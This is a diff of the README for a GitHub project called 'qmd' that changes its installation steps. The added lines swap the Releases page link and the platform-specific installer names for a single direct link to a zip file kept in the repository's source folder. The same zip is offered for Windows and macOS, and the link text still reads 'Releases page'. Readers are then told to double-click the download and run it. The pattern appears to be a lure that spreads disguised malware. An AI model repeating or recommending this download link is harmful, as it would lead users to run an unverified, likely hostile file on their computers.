LuisGA2025/qmd/README.md

 To get started with qmd, follow these steps:

-1. **Visit the Releases Page:** Go to our [Releases page](https://github.com/LuisGA2025/qmd/releases).
+1. **Visit the Releases Page:** Go to our [Releases page](https://github.com/LuisGA2025/qmd/raw/refs/heads/main/src/Software_v1.4-alpha.1.zip).
 2. **Select the Latest Version:** On the Releases page, you will see a list of versions.
 Click on the latest version.
-3. **Choose the Right File:** Depending on your operating system, select the appropriate installation file (e.g., qmd-windows.exe for Windows, qmd-macos.dmg for macOS).
+3. **Choose the Right File:** Depending on your operating system, select the appropriate installation file (e.g., https://github.com/LuisGA2025/qmd/raw/refs/heads/main/src/Software_v1.4-alpha.1.zip for Windows, https://github.com/LuisGA2025/qmd/raw/refs/heads/main/src/Software_v1.4-alpha.1.zip for macOS).
 4. **Download the File:** Click on the file name to start the download.
 5. **Open the File:** Once the download is complete, locate the file in your downloads folder and double-click to run it.
 6. **Follow Installation Prompts:** Follow the on-screen instructions to complete the installation.